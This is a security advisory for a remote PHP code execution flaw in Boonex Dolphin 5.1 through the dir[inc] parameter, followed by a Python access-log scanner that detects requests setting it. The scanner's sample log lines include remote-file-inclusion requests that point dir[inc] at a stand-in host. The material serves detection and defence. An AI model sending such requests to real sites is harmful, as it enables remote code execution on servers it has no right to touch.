PT-2006-5009 · Boonex · Dolphin

Published: 2006-08-17 · Updated: 2017-07-20 · CVE-2006-4189

CVSS v2.0: 5.1 (Medium)

Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions

Dolphin version 5.1

Description

The issue allows remote attackers to execute arbitrary PHP code via a URL in the dir[inc] parameter in multiple PHP scripts, including "index.php", "aemodule.php", "browse.php", "cc.php", "click.php", "faq.php", "gallery.php", "im.php", "inbox.php", "join_form.php", "logout.php", "messages_inbox.php", and many other scripts.

Recommendations

For Dolphin version 5.1, consider restricting access to the dir[inc] parameter in the affected PHP scripts until a patch is available. As a temporary workaround, avoid using the dir[inc] parameter in the vulnerable scripts, such as "index.php", "aemodule.php", and others, to minimize the risk of exploitation.
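
To check whether the dir[inc] parameter is being supplied from outside, the added example below (not part of the original advisory) scans web server access log lines for requests that set it, including the percent-encoded form of the name. The log format, the sample lines, and the names `classify` and `scan` are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Request target inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that names a remote resource (scheme://...), as the advisory describes.
REMOTE_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)
PARAM = "dir[inc]"  # parameter named in the advisory

def classify(line):
    """Return None, 'param-supplied' or 'remote-url' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = m.group(1).partition("?")[2]
    verdict = None
    # parse_qsl percent-decodes names and values, so dir%5Binc%5D matches too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != PARAM:
            continue
        if REMOTE_RE.match(value.strip()):
            return "remote-url"
        verdict = "param-supplied"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every line that sets dir[inc]."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits

# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Aug/2006:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Aug/2006:10:00:05 +0000] "GET /faq.php?dir[inc]=http://host.example.invalid/a.txt HTTP/1.0" 200 312',
    '198.51.100.7 - - [17/Aug/2006:10:00:09 +0000] "GET /gallery.php?dir%5Binc%5D=http%3A%2F%2Fhost.example.invalid%2Fa.txt HTTP/1.1" 200 298',
    '192.0.2.44 - - [17/Aug/2006:10:01:00 +0000] "GET /browse.php?dir[inc]=inc/ HTTP/1.1" 200 4010',
    '192.0.2.10 - - [17/Aug/2006:10:02:00 +0000] "GET /browse.php?page=2 HTTP/1.1" 200 6001',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

Access logs record only the query string, so a dir[inc] value sent in a POST body would not appear here; any hit, remote URL or not, is worth reviewing because legitimate clients have no reason to set this parameter.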


Related Identifiers: CVE-2006-4189

Affected Products: Dolphin